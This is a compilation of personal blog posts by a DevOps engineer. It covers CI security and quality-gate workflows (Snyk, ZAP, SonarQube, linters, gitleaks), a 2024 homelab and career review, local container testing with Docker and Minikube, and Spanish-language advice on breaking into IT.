  pull_request:
    branches: ["master"]

permissions:
  contents: read

jobs:
  snyk:
    permissions:
      contents: read # for actions/checkout to fetch code
      security-events: write # for github/codeql-action/upload-sarif to upload SARIF results
      actions: read # only required for a private repository by github/codeql-action/upload-sarif to get the Action run status
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Set up Snyk CLI to check for security issues
        # Snyk can be used to break the build when it detects security issues.
        # In this case we want to upload the SAST issues to GitHub Code Scanning
        uses: snyk/actions/setup@806182742461562b67788a64410098c9d9b96adb

        # For Snyk Open Source you must first set up the development environment for your application's dependencies
        # For example for Node
        #- uses: actions/setup-node@v4
        #  with:
        #    node-version: 20

        env:
          # This is where you will need to introduce the Snyk API token created with your Snyk account
          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}

        # Runs Snyk Code (SAST) analysis and uploads result into GitHub.
        # Use || true to not fail the pipeline
      - name: Snyk Code test
        run: snyk code test --sarif > snyk-code.sarif # || true

        # Push the Snyk Code results into GitHub Code Scanning tab
      - name: Upload result to GitHub Code Scanning
        uses: github/codeql-action/upload-sarif@v3
        with:
          sarif_file: snyk-code.sarif

Remember to add the SNYK_TOKEN to the secrets.

A simpler option could be CodeQL if you are using Github

Dast

Disclaimer: DAST can affect the current system integrity y/o app, so add it at your own risk or make sure to have monitors for it.

Like mentioned before, for DAST there is a lot of things.

The one that I’m using right now is https://github.com/marketplace/actions/zap-baseline-scan

You can also use https://github.com/marketplace/actions/zap-full-scan

They give a full example on how to run it

on: [push]

jobs:
  zap_scan:
    runs-on: ubuntu-latest
    name: Scan the webapplication
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          ref: master
      - name: ZAP Scan
        uses: zaproxy/action-full-scan@v0.12.0
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
          docker_name: 'ghcr.io/zaproxy/zaproxy:stable'
          target: 'https://www.zaproxy.org/'
          rules_file_name: '.zap/rules.tsv'
          cmd_options: '-a'

But here you can check out a lot of them

https://www.acunetix.com/blog/web-security-zone/10-best-dast-tools/

Quality Gates

Our beloved Sonarqube could enter here (not the only one) but one reliant and good tool to cover this section since we can use it cloud or self hosted.

To add a project into sonarqube cloud, we need to have an organization

Both creating an organization or adding a project could be found in the same place

Once we select our organization, we can select a repository to import. Sonarqube is going to ask us about the method of scan on new code

In my case since I’m not doing releases on my personal projects I’ve selected the second option

Also I’m using the automatic analysis (works quite well even tho sonar itself says not recommended)

With this option enabled whenever you open a pull request it will leave a comment with the status of that new code

From there we can follow and see the issues mark by sonarqube. You can also use their extension in VSCode to track things earlier before they appear on a PR

With this installed we could add a sonar server (self hosted) or the cloud one (my case)

We could also manually check the issues in their webpage if needed

Linter

In the linter section we should evaluate if this needs to run either at pre-commit level or CI one, since it can be tedious for the developers in some cases (mostly because of their gitflow)

Also depending on the lang you are working on you may need a different tool. In this example I’m going to use https://golangci-lint.run/ in a golang project.

In the root of my project I have a Makefile which I mostly use it to have shortcuts for commands (so I don’t have to remember them) or just to add a dependency (another command) previous to run that one.

In the case I’m highlighting here I’m running path before lint. To run this I have to type make lint and it will check these things (that are defined in my .golangci.ymal

# yaml-language-server: $schema=https://golangci-lint.run/jsonschema/golangci.jsonschema.json
## Copied from https://github.com/microsoft/typescript-go
### https://golangci-lint.run/usage/linters/

run:
  allow-parallel-runners: true
  timeout: 180s

linters:
  disable-all: false
  enable-all: true
  disable:
    - tenv
    - godox
    - gci
    - gofumpt
    - godot
    - gofmt
    - wsl

linters-settings:
  depguard:
    # Rules to apply.
    #
    # Variables:
    # - File Variables
    #   Use an exclamation mark `!` to negate a variable.
    #   Example: `!$test` matches any file that is not a go test file.
    #
    #   `$all` - matches all go files
    #   `$test` - matches all go test files
    #
    # - Package Variables
    #
    #   `$gostd` - matches all of go's standard library (Pulled from `GOROOT`)
    #
    # Default (applies if no custom rules are defined): Only allow $gostd in all files.
    rules:
      # Name of a rule.
      main:
        # Defines package matching behavior. Available modes:
        # - `original`: allowed if it doesn't match the deny list and either matches the allow list or the allow list is empty.
        # - `strict`: allowed only if it matches the allow list and either doesn't match the deny list or the allow rule is more specific (longer) than the deny rule.
        # - `lax`: allowed if it doesn't match the deny list or the allow rule is more specific (longer) than the deny rule.
        # Default: "original"
        list-mode: lax
        # List of file globs that will match this list of settings to compare against.
        # Default: $all
        files:
          - "!**/*_a _file.go"
        # List of allowed packages.
        # Entries can be a variable (starting with $), a string prefix, or an exact match (if ending with $).
        # Default: []
        allow:
        - Scruticode/src/config
        - Scruticode/src/constants
        # List of packages that are not allowed.
        # Entries can be a variable (starting with $), a string prefix, or an exact match (if ending with $).
        # Default: []
        deny:
          - pkg: "math/rand$"
            desc: use math/rand/v2
          - pkg: "github.com/sirupsen/logrus"
            desc: not allowed
          - pkg: "github.com/pkg/errors"
            desc: Should be replaced by standard lib errors package

issues:
  max-issues-per-linter: 0
  max-same-issues: 0

  exclude:
    - '^could not import'
    - '^: #'
    - 'imported and not used$'

Since I’m using the enable-all rule everything is enabled and in the disable section I’m discarding some of them.

The full list of linters available for this tool are here https://golangci-lint.run/usage/linters/ each one checks something different and can be customized

In my case in addition to golangci I’m using https://pre-commit.com/ that works as a general rule for pre-commit rules (hooks/wrappers for the ones in .git)

To start a pre-commit project we need to ofc installed, then once we have it available globally on our system we can

pre-commit:
    pre-commit clean
    pre-commit install
    git add .pre-commit-config.yaml

We also need a .pre-commit-config.yaml

## https://golangci-lint.run/usage/configuration/

repos:
  - repo: https://github.com/tekwizely/pre-commit-golang
    rev: v1.0.0-rc.1
    hooks:
      - id: go-imports ## go install golang.org/x/tools/cmd/goimports@latest
      - id: golangci-lint ## yay -S golangci-lint
        args: ["--fix"]

Here I’m saying which hooks I want to run on each commit, since most of the things are being part of my linter I only use these two.

New if the hooks run and I had something that won’t pass their validations it will be displayed like this

Like mentioned before, this could be run it pre-commit level or CI level. If we decided to run it at CI level we should need to install golangci at the pipeline. I’ll suggest using their binary

https://golangci-lint.run/welcome/install/#binaries

Then export the golang path with export PATH="$PATH:$HOME/go/bin" this will make the binary available for the shell that is running.

Format

In the case of format I’m gonna explain using the JS ecosystem, one popular tool there is Prettier.

To install prettier we should follow their guide https://prettier.io/docs/install/

Also think this, if everyone in the team uses prettier, consider not using a extesion and have configuration at VSCode level and repository level, only use the one in the repository since is the one that follows your company needs.

One pretter.config.js could look like this

export default {
    "arrowParens": "avoid",
    "bracketSpacing": true,
    "htmlWhitespaceSensitivity": "css",
    "insertPragma": false,
    "printWidth": 80,
    "proseWrap": "always",
    "quoteProps": "as-needed",
    "requirePragma": false,
    "semi": true,
    "singleQuote": true,
    "tabWidth": 2,
    "trailingComma": "all",
    "useTabs": false
};

And your package.json like this

  "scripts": {
    "lint": "eslint ./src/**/*.ts",
    "lint:fix": "eslint ./src/**/*.ts --fix",
    "format": "prettier --check ./src/**/*.ts",
    "format:fix": "prettier --write ./src/**/*.ts",
  },

Now same here as the linter one, we could add with husky a step for pre-commit or added into the CI process.

For prettier in the github actions you could use https://github.com/marketplace/actions/prettier-action

Which contains an example

name: Continuous Integration

# This action works with pull requests and pushes
on:
  pull_request:
  push:
    branches:
      - main

jobs:
  prettier:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout
        uses: actions/checkout@v3
        with:
          # Make sure the actual branch is checked out when running on pull requests
          ref: ${{ github.head_ref }}

      - name: Prettify code
        uses: creyD/prettier_action@v4.3
        with:
          # This part is also where you can pass other options, for example:
          prettier_options: --write **/*.{js,md}

Secrets

In the case of secrets we could check if someone uploaded sensitive information to alert the team about it.

(In the case of a git workflow in github, gitlab, azure, blabla) it could be that the portion of code remains there (azure won’t delete abandoned pull requests for example)

In the case of gitleaks I’m using a reusable workflow that I’ve built myself

name: CI/CD

on:
  workflow_dispatch:
  push:
    branches:
      - master
      - development
    paths:
      - "src/**"
      - "Dockerfile"
      - ".github/workflows/*.yml"
  pull_request:
    branches:
      - master
      - development
    paths:
      - "src/**"
      - "Dockerfile"

env:
  BRANCH_NAME: ${{ github.ref_name }}
  APP_NAME: waifuland_api
  APP_VERSION: latest
  APP_DEV_VERSION: unstable

jobs:
  gitleaks:
    uses: jd-apprentice/jd-workflows/.github/workflows/gitleaks.yml@main
    with:
      runs-on: ubuntu-latest
      name: Gitleaks
    secrets:
      gh_token: ${{ secrets.GITHUB_TOKEN }}

The origin of that workflow comes from https://github.com/jd-apprentice/jd-workflows

Conclusion

Now like I mentioned in some of the points, a few steps can be done at pre-commit level and not in the pipeline itself, that’s up to you or your team. But if you want to enforce everything you can do it here without interfere with the code in their projects.

Like every year since I enter this field, I made a lot of progress. I’m a person who likes to have always a goal in mind and look for new heights, building more complex stuff, changing my thinking, meeting more incredible people.

I’m going to make a brief summary about my 2024, things that I enjoyed spending time, build and play with it.

Homelab

The most important and probably the thing with more changes than anything is my homelab here at home, in my last post regarding this I had only one (https://blog.jonathan.com.ar/build-your-own-homelab-with-a-raspberry-pi-zero-2-w-and-cloudflare-zero-trust) machine! And it was a tiny one

Now, you may ask how I ended like this?

Well everything started with only one of these smaller ones, I started by deploying some of my apps there and testing self hosteable products

I have some apps that I wrote in the past when I was learning web development and I’ll always use them for experiments I add random tools or concepts to that apps and adjust them for whatever I want to learn, some of them even got thought entire re-writes in other languages like TS → Golang.

Some of the apps are these

• https://github.com/jd-apprentice/waifuland-api

• https://github.com/jd-apprentice/waifuland-fe

• https://github.com/jd-apprentice/infobae-api

• https://github.com/jd-apprentice/libritos

• https://github.com/jd-apprentice/jd-bun

These projects help me not only learn new stuff for my daily experiments but to be a more competent professional in my current job, where I started as a JR DevOps, and now I’m SR DevOps/Consultant.

The jd-bun project reflects the actual quality of my project while I’m not even a developer anymore, these include

• quality gate workflows, deployments, documentation

• templates for pull_requests, issues, features, codeowners

• pre-commit conventions in each of the projects

• unit + integration testing for each of my projects

• multiple ways to dockerize an app, hardening, arm7 + arm64 + x86_64

• apparmor, seccomp, base + intermediary images, scratch, distroless

• secrets as a service, error handling, schema validations

• models, middlewares, code styling

Now across everything I had done in my homelab, most of the things were documented and explained + related in a private GitHub project that I have

Whereas you can see I have more than 100 issues closed in the past 2024, which some of them include a lot of work and explanations of how I ended up doing X, here is an example

Each issue maybe has more than 10 comments explaining what I had done there, which screenshots and stuff.

Right now I have multiple things running in here, these are only internal

Whenever I need to access to those things from outside my LAN, I have a WireGuard server running on my MikroTik

The internal things are encrypted via SSL with Let’s encrypt CA, via a DNS challenge and no need to expose ports or things to the internet. Before this, I had self-signed certs with my own CA, but having to load the cert in every decide on my network was not optimal.

For things that are exposed to the internet like for example my links page, they are protected with Cloudflare and exposed with Cloudflare tunnels

Page in action

About how these apps are running inside the machines well there were a lot of experiments there, I tried

• pm2

• docker standalone

• docker swarm

• k3s + rancher

• systemd services

Also before my minipc arrived I tried proxmox inside one of the raspberry pies and used vm’s and LXC

What about deployments?

My repository with stuff looks something like this

Well I had also tried a lot of things, I’m going to list some of them

• manual ssh to servers

• bash scripts

• ansible

• ansible + terraform

• github actions + ansible + terraform

• argo cd / flush cd

I had even created a repository for some of my most frequent workflows https://github.com/jd-apprentice/jd-workflows/tree/main/.github/workflows, so I don’t have to modify them everywhere

I even have some frequent cronjobs that monitor performance, security and more.

Stress Testing

Vulnerability Scanning

SAST Scanning

Most of these actions are sent to either my gotify server

Or to a telegram chat where I also send stuff

What about backups?

Things are simple, I’m running cronjobs on each machine that save random stuff to telegram and sensitive stuff to a storage server I have + 2 separate disks with rsync.

And about the GitHub stuff that I have since there is a lot of issues and code there, I’m running a full clone to Gitea first 1 of each month

Also, there are some backups from my arch running in these servers but not part of the homelab hehe

What about monitors/alerts?

Alerts are at discord

There are alerts from

• Cloudflare

• Uptimekuma

• Netdata

• Gotify

For infra I’m using netdata since I have a few machines, but I’m thinking about migrating to ELK

For apps there is the kuma itself mentioned before.

At there are some handmade scripts that I made in the past when I only ran the small raspberries and I had no way to monitor outside stuff like dashdot that I’m still running in the ingress server

And the Cloudflare part?

Well in Cloudflare there are a few things. Let’s go there, foremost my main domain with his traffic

What I’m using from cloudflare?

• dns

• emails

• waf

• cache

• r2

• tunnels

Since at the beginning I was running everything including local things in Cloudflare I had a lot of applications rules to hide/protect things that I don’t wanted to expose to everyone

My reliable tunnel for exposing things to the internet safely

improve

And inside the servers?

What things I improve here?

• Hardening

• Scripting

• Networking

• Containers

• Cronjobs

• Systemd services

• Troubleshooting

Well there are apps running in k3s like I mention before (Ignore the fact that these are running in the default namespace, I already move them properly the picture is old LMAO)

ofc there are also things running in docker standalone and swarm still, not everything needs to be inside k3s

And of course there is my worth proxmox

Here the PROD one (4c/4t, 16gb, 512gb storage)

And the development one which I was using for experiments and moving things to the production one right now

Everything here is managed with Terraform, and I’m saving the state inside a PG on the storage server + a backup on a R2 from Cloudflare.

One of the machines is acting as an Ingress and exposing things via Nginx Proxy Manager

This one is temporal but is Storage

What about networking?

Things that I got in touch in the last month

• DNS

• Subnets

• Firewall filtering

• VLANs

• Interfaces

• Bridges

• Routing

• DHCP Servers

• VPN’s

I had at least broke everything like 7 times, which broke I mean I had no internet because of misconfigurations. Thank god I had backups every time I changed 1 thing, also MikroTik documentation is awesome.

Right now, the thing is something like this. Excluding the fact that I used other ranges

I have 4 VLANs, 3 tagged and 1 untagged, running with the MikroTik in a dual NAT (for now)

VLAN’s can still communicate to each other once I decide where I’m going to move the ingress machine or If I’m going to use one ingress for each VLAN

The k3s cluster only is there for the apps exposed to the internet, and I’m using these apps to monitor the load on the servers and get some metrics.

Pentesting

Why pentesting?

Good question, I can say that pentesting is not 100% related about what I’m currently doing (DevOps/SRE) but I say in my head, Hey! I want to understand how people can attack my apps and ended up expending around 3-4 months doing machines in HTB

The repository with everything is right here

• https://github.com/jd-apprentice/hack-the-box

• https://pentest.jonathan.com.ar/

Also, there is this MkDocs that contains every markdown

I managed to be invited as a Guest in a meeting of the HTB Argentinian community solving a machine live

Can be seen here https://www.youtube.com/watch?t=4479&v=zxmCYEddfeU&feature=youtu.be

Went to some events (and meet coworkers)

Made some appearances in global CTF’s

Also, some local ones

And the most important thing for me, I joined one of the best teams in Latin America https://d1stinct.com/ which at the time I’m writing this is the Top 1 in Argentina, outside of that I made some great friends that I love to be part of their lives.

My career growth

My entire 2024 was on the same company, so I’m going to use that as a reference

Moving along from my Software Developer role last year, I enter this company as a DevOps Engineer JR, which is my first Infrastructure experience, I’m really thankful for the opportunity, but I believe that my hardwork ended un being a good decision since I had the most growth of the entire team, thanks to the time I spent with my experiments and people around me always pushing me to be better every day.

Now let’s talk about my current role, currently I’m the referent of the DevOps team in one of the clients, being part of the architecture had expanded my mind and knowledge in a way that I’ll say no other role has the opportunity to do so, this because while being in touch with the developers and knowing the day by day problems, I’m also in contact with the executives and see the business needs and I can align my ideals to benefit everyone.

My responsibilities currently are beyond the DevOps, sometimes I act as a software architect since the role is needed, here are some of the things I do in my daily basis. (Copying and expanding from the linkedin)

1. Build guidelines for teams to follow best practices in development, infrastructure, and testing.
2. Design infrastructure, implementation, and technical documentation.
3. Ensure projects completion and build reports for stakeholders.
4. Enforce quality and security in the development process.
5. Satisfy applications architecture and business needs.
6. Technical interviews and seniority review.
7. Assistance and mentor of team members.
8. Code review and pair programming.

1. First point

I wrote more than 50 pages of documentation (in a few months), videos and code examples, templates, PoCs about how everything should be done, from how commits should be done, names for repositories, process on how to request for X, how teams must behave in X situation, every time a new person entered the team we done our regular onboarding process and once I found something that was not “expected” I added that exception to the documentation.

2. Second point

Even thought my initial role was not responsible for these sort of that those things I really enjoyed them and started doing it by myself but in later stages I ended up being asked or at least got considerated for an opinion for everything, which is some cases is not optimal but I’m glad people valuate my opinion.

3. Third point

While my boss is the one who is asked to dates related to finish things, after being a referrer I started to understand the importante of ensuring completions in established deadlines and started focusing these things, while also helping in reporting stuff to the superiors of him.

4. Four point

When I arrived here the CI/CD process only contain the build stage for the app and sonarqube report (without coverage). Now the entire CI/CD process contains

• Testing (Unit, Integration, E2E if applies)

• SAST (coverage included, stops the pipeline if quality gate is not passed)

• Vulnerability scan (stops the pipeline if high+ vulnerabilities are discovered)

• Secret managment for sensitive values

• Re-usable workflow (templates)

5. Fifth point

While most of the people/roles focus on their only task given, I’m doing that plus looking for that the business needs, speaking with executives, stakeholders and listening to them to ensure that I’m aligned with them.

6. Six point

Although this was not part of my initial contract neither never mentioned, the client that I’m working on decided to invite me to the interviews because he belives in me (Happy Joni). Also I’m giving feedback for new people and helping to found/decide their seniority.

7. Seven point

Whenever there is a new people on the team I always got call with thems (if they are technical) and do a quick tour about everything we have and provide them with documentation links, videos, documents, and everything needed, some of them are directly in my charge so I’m continuous work to make them improve and ensure they fell safe and can operate well.

Every 2 weeks I usually give meets/talks about new concepts that I’m including in the development process so developers can get in touch faster with things I’m adding.

8. Eight point

Thanks to my hardwork and background as a developer, people often ask me to review their work because of my high quality for every process that I’m part of it. I’m also often in call to help people with their problems when they are stuck for too long.

Not current job related

Well I had done a lot of things but one of the most cool ones or at least my favorites were joining the RustlangES (https://rustlang-es.org/) community in which I become a active contributor

In which I gave a talk in the last few months https://www.youtube.com/watch?v=B9WX3VC9TG4

And I’m publishing blogs whenever I learn something cool https://blog.rustlang-es.org/articles/cargo-generate

Currently I’m helping with these things

- Build automations with GitHub Actions (reusable workflows)
- Create content for the community (blogs, talks, workshops)
- Networking management (waf, cache, analytics, etc)
- Advisories (vulnerable dependencies)
- Code quality and testing enforcement

Rustlang is not the only org I’m part of it :)

Certifications

Got github foundations at speedrun level (went into the exam with no prep and took me around 11 minutes) this is why I’m using github non stop for the past 4 years so this was no issue at all.

I’m thinking about taking the actions one and maybe security

Also I’ll give a shot to some of the kubernetes certs in this 2025.

Some of the random certs from Cloud Guru, also speed run level.

Also got in Completed some cool labsHTB and Tryhackme there is a lot of things like

Events

Not only I was part of the ekoparty that I showed a picture in the Pentesting section but also I participed in the nerdearla this year

but also the AWS cloud experience

and the global game jam (https://globalgamejam.org/games/2024/one-more-chance-2)

Conclusion

If you are here thank you so much for taking the time to read everything!

There is 100% a lot of things I’m missing but I tried my best haha

I’m still going to keep being a better version of me every day once I have no more room to improve, not only tecnical but as a person itself, while also helping others. Things are more fun when you have company to travel that path.

Software Development Life Cycle

So, coding is an important part of the SDLC or the product itself but pushing your code to the repository is neither the end nor the beginning, there are a lot (really a lot) of things happening previously and after that!

Graph took from [HERE](https://www.geeksforgeeks.org/software-development-life-cycle-sdlc/)

So it’s significant to understand the complete SDLC, why? Because one of the final aspects of it is the deployment! And the deployment is totally dominated by the Linux OS.

But people don’t use Linux in the personal or working computers, not as much as Windows, so that creates us a problem where developers try their apps on Windows then push their code and end up uploading that code to a Linux machine. So here if there is an error because the OS works differently.

How we can solve it?

One of the many solutions for these is something that is quite popular in the recent decade and is containers, I’m not going to explain what they are or how they're work, but rather why we should use them at least for local development, even if your server doesn’t run another OS.

Proposal #1: Docker

Using the docker engine we can build what is called Dockerfiles here is an example of a Golang app running GIN a web framework.

# DEV
FROM golang:alpine3.20 AS build

WORKDIR /app
COPY . /app
RUN go mod download
RUN GOARCH=amd64 go build -o ./bin/InfobaeAPI ./src/main.go

# PROD
FROM alpine:3.20

RUN addgroup -S appgroup && adduser -S infobae -G appgroup
WORKDIR /app
COPY --from=build /app/bin/InfobaeAPI /app/bin/InfobaeAPI
ENV GIN_MODE=release

USER infobae
ENV PORT=3000
EXPOSE ${PORT}
ENTRYPOINT ["/app/bin/InfobaeAPI"]

If our apps communicate with other components, or we just want to have an easier read of the panorama (or just type less) we can create a compose.yml

services:
  infobae:
    container_name: infobae
    ## https://hackernoon.com/how-to-harden-your-docker-containers-using-seccomp-security-profile-81153ucz
    security_opt:
      - no-new-privileges
      - seccomp=./security/seccomp.json
      - apparmor=./security/non-root.profile
    restart: unless-stopped
    cap_add:
      - CHOWN
      - NET_BIND_SERVICE
    cap_drop: ["ALL"]
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "${PORT}:3000"

In this example, I’m creating a service with a unique container that has some security constraints.

This container is going to build in an operating system called alpine which is a minimal operating system often used for work fulls that don’t need that many things.

With docker compose up -d while having the compose and Dokerfile in hand, we can create a docker container that will run our app with the base OS and our app.

The end result is something like this where I see my app running, if my machine was a windows one, and I wanted to try how it works in a Linux environment, this was a success (at least for runtime apps, read something about build time just in case)

This workflow is valid in simple environments where Kubernetes is not into mind. Next we are going to cover the Kubernetes part.

Proposal 2: Minikube

Post used as reference [HERE](https://www.digitalocean.com/community/tutorials/how-to-use-minikube-for-local-kubernetes-development-and-testing)

In some workflows there are Kubernetes clusters with are part of the entire infrastructure, so testing docker would be fine since the container itself is part of the pods which is the smallest components in the Kubernetes ecosystem, but maybe we want to try more components of it, that’s why building a local cluster can be handy.

But you may be thinking, building a local cluster won’t be hard for a developer? Is not even part of their job, well kinda. Their job is to make the app work no matter what, so testing locally in a real scenario would be ideal for them. Lucky enough, there are solutions like Minikube which creates clusters for local development quite easily.

Now let’s get into practice, In my case I used Kompose to convert the compose.yml into Kubernetes manifestos, with a command like this kompose -f compose.yml convert I got this file

apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    kompose.cmd: kompose -f docker-compose.yml convert
    kompose.version: 1.34.0 (HEAD)
  labels:
    io.kompose.service: infobae
  name: infobae
spec:
  replicas: 1
  selector:
    matchLabels:
      io.kompose.service: infobae
  template:
    metadata:
      annotations:
        kompose.cmd: kompose -f docker-compose.yml convert
        kompose.version: 1.34.0 (HEAD)
      labels:
        io.kompose.service: infobae
    spec:
      containers:
        - image: dyallo/infobae_api
          name: infobae-dev
          ports:
            - containerPort: 3000
              protocol: TCP
          securityContext:
            allowPrivilegeEscalation: false
            capabilities:
              add:
                - CHOWN
                - NET_BIND_SERVICE
              drop:
                - ALL
      restartPolicy: Always

And this one too

apiVersion: v1
kind: Service
metadata:
  annotations:
    kompose.cmd: kompose -f docker-compose.yml convert
    kompose.version: 1.34.0 (HEAD)
  labels:
    io.kompose.service: infobae
  name: infobae
spec:
  ports:
    - name: "5000"
      port: 5000
      targetPort: 3000
  selector:
    io.kompose.service: infobae
  type: NodePort

Now using kubectl we can do something like kubectl -f apply . and apply all changes of the manifestos we created before with kompose

Here I make sure that the cluster is running with minikube start, apply the manifestos with kubectl apply -f ./kubernetes, check that the service is running kubectl get services grab the IP from the cluster since I’m using NodeIP in the service with minikube ip and curl the app (since is an API).

Conclusion

It is always necessary to test (also with testing!) your apps before publishing into the server, do not be satisfied only by running things like npm run dev or npm run build your OS is not always the same as the server! Learn more about what happens before and after you start coding.

Don’t be a code monkey.

TL;DR - Dediquen mucho tiempo, no esperen que sus experiencias los hagan mejorar, pueden escapar muy rapido las personas del mercado no son dedicadas lo suficiente

¿Cuál fue mi trayectoria hasta llegar a mi primer trabajo?

Para ingresar a IT estuve al rededor de 10 meses dedicándole un aproximado de 10 hs por día durante ese periodo de tiempo, esa sería la versión corta. Despues de esto consegui trabajo como desarrollador frontend web, en la actualidad trabajo como devops (si, hice cambio de rol, eso para otro blog)

¿Ahora la versión larga, que hice exactamente? ¿Y qué fue diferente a los demás?

No hice bootcamps, cursos y demás (disclaimer)

¿Por qué no hice bootcamps, cursos ni nada guiado? Porque encontré que en la realidad, trabajar en IT es tener cierto grado de autonomía y adaptarse a los cambios, meterse en cosas desconocidas y muy pocas veces luchar contra algo que quizás no exista siquiera en internet. Entonces dicho esto, mi proceso fue el siguiente, todo el aprendizaje fue con base en proyectos, proyectos para aprender temas en particular, proyectos para mezclar cosas, para crear algo útil y muchas ideas más, actualmente sigo haciendo esto y tengo actualmente 166 repositorios

¿Y como se ve esto desde que empecé?

Esto es la constancia que tuve desde que empecé en junio del 2021 (en el 2020 me había hecho la cuenta, pero no me interese hasta el 2021). ¿Esto realmente me ayudo a buscar trabajo, el tener el GitHub tan lindo? No, pero sí el tiempo dedicado en aprender y tener proyectos que presentar en las entrevistas.

Disclaimer: ¿Realmente no hiciste ningún curso? Si hice muchos, pero nunca los hice para aprender porque siempre quise tener la autonomía suficiente para crear yo mis propios problemas, decidir que era necesario a sumar a mi expertise como también crear mis propias soluciones, hacer cursos reduce todo tipo de capacidad que puedes tener, sino para publicitar de forma que el mercado le interese (diciendo que termine algo) entonces lo que hacía era aprender todo por mi cuenta y después iba y dejaba el curso terminarse sin mirarlo o si era preguntas y respuesta los hacía sin leer nada (porque ya venía con el conocimiento por hacer proyectos) entonces era el equivalente a rendir libre). Estos entonces los usaba para publicar en linkedin cada tanto y que se vea que estoy haciendo algo, ya que tristemente a la industria todavía les interesa mucho que uno tenga todo tipo de educación (sacando lo obvio que es la universidad) ser autodidacta puro te va a hacer pasar una entrevista técnica sí, pero para el mercado y RR. HH. no tienes valor alguno sin absolutamente nada.

Compartí todo mi conocimiento públicamente

¿A qué me refiero con esto? Que además de publicar cosas en LinkedIn cada 2 semanas, ya sea por algo terminado o que tenga avances, le muestre siempre a mis personas cercanas mi conocimiento esto hace que los demás puedan ver lo que sabes/vales y puedan presentarte a otras personas, llegando eventualmente a ganar alguna recomendación.

Me hice uni a comunidades e hice amigos

A principio aprendía parcialmente solo y no tenía guía alguna, ni conocía roadmaps, era un total desastre mi ruta de aprendizaje un día me tenías aprendiendo frontend y al otro día sistemas embebidos, hasta que me metí a una comunidad y me empezaron a orientar de como funcionaba el mercado si bien progresaba día a día era un total desastre todo. Además de que conocí gente en mi mismo nivel y empezamos a hacer proyectos juntos, esto fue un montón porque ya ganas algo de experiencia real, tuve la suerte de participar en una comunidad llamada Frontendcafe que además organizaba proyectos con gente muy buena (tanto emocional como técnicamente) y nos mentoreaban, desde ahí mi día a día era hacer proyectos en grupo todos los días y solo también. A este punto, ya si bien mi conocimiento era bajo, estaba superbién encaminado.

Cree constancia, haciendo retos y demás

Así como me había conseguido amigos para estudiar seguido, empecé retos, tenía un horario para proyectos (como que mis proyectos era mi horario laboral) y después de eso tomaba retos de internet para dedicarles 1 hora al día, ej. hice este https://github.com/jd-apprentice/Javascript30Solutions. ¿Por qué es importante la constancia? Si las demás personas no se esfuerzan y vos le dedicas un poco cada día eventualmente los superas, aunque no está bien compararse con los demás, todos los días vas a ser una mejor versión tuya, yo no soy una persona muy iluminada es más diría que estoy por debajo de la media en mis capacidades, las veces que intente la universidad ni siquiera pude pasar el filtro inicial, pero la constancia termino siendo mi mejor arma.

¿Es posible esto para todos?

Posiblemente no, pero lo mío fue planeado, siendo de una familia de bajos recursos, trabaje muchísimo tiempo y ahorre lo suficiente como para poder estar sin trabajar un tiempo mientras vivía con mi familia, aportando desde mis ahorros y enfocándome de la forma más óptima posible (hice muchos sacrificios a nivel social y darme lujos)

Resumen

1. Dedicarle tiempo, realmente aprendiendo no solo queriendo aparecer, si vas a hacer cursos está bien, pero invertí el tiempo que sea necesario para aprender y no solo terminar cosas para publicarlas, ponle más tiempo a la práctica siempre, no puedes pretender decir que sabes algo por solo saber la teoría, eso queda para la universidad.

2. Constancia, no hace falta que sean 10 hs todos los días, pero mínimo tendrías que dedicarle 20 hs semanales, es mejor si es una X tiempo al día que todo un fin de semana, eso va a depender de la vida de cada uno, pero la constancia termina siendo mejor recuerden eso, utilicen retos u proyectos y vayan de a poco.

3. Compartir tu conocimiento, ya sea con publicaciones en discord, twitter, linkedin, youtube, foros, etc. Demuestra tu conocimiento, mostrale tu progreso al mundo para que vean como cada día sabes más y puedan en algún momento ponerse en contacto con vos por algún trabajo

4. Participa en comunidades, hazte amigos, aprende con otros. Esto es super importante al final del día, ya que individualmente del rol que estés metido, vas a trabajar en equipo, a su vez puedes tener la suerte de encontrar gente muy buena y que te ayuden

¿Qué pasa una vez que encontramos trabajo? ¿Cómo escalamos?

Una vez ingresas a IT no pasa a ser todo mágico, la mayoría que no nos preparamos e inclusive los que si (universidad) quizás ingresamos y nos damos cuenta de que todavía nos falta mucho, mi caso si fue ese me di cuenta de que todavía no estaba para nada listo y eso que mi primer trabajo era superfácil (si lo veo comparado a lo que hago hoy en día). Como también recuerden el mercado está apuradísimo y a pesar de tener experiencia el puesto de JR sigue siendo un descontrol, hasta que no pases a algo como SSR u SR posiblemente no llames la atención, que hice yo entonces? A pesar de que ya tenía trabajo, seguí con la misma rutina, educándome todos los días haciendo proyectos y aplicando lo que aprendía en mi trabajo y todavía rodeándome de aún más personas que tenían la misma sed de progreso que yo, a que me llevo a esto? A que en menos de 3 años pude alcanzar el nivel de responsabilidad de un SR.

Basándome en lo que define getonbrd me encuentro cumpliendo todas estas en la empresa que estoy, tuve un poco de suerte en que en mis primeros 2 trabajos las personas con las que trabaje (a pesar de mi nivel actual) sigo considerando que saben muchísimo entonces si me comparo con otras personas veo que no todos tuvieron esa suerte, pero aun así mi mentalidad siempre fue la de alguien autocritico como la de querer mejorar todos los días un poco.

No hay que dejar de mejorar

Como mencione en el punto anterior, a pesar de conseguir trabajo a como está el mercado de hoy no hay que pensar que ya vamos a tener trabajo para siempre, más si nos ponemos en comparativa contra gente que tiene un título universitario, no hay que bajar las aspiraciones (si la exigencia si quieren depende su vida, su salud y lo que los rodea) pero hay que avanzar hasta mínimo SSR/SR como para poder pensar encajar en el mercado en el mediano/largo plazo. Yo en mi caso quiero ser arquitecto, así que tengo mucho por delante todavía.

¿Cuál es el estado actual del mercado?

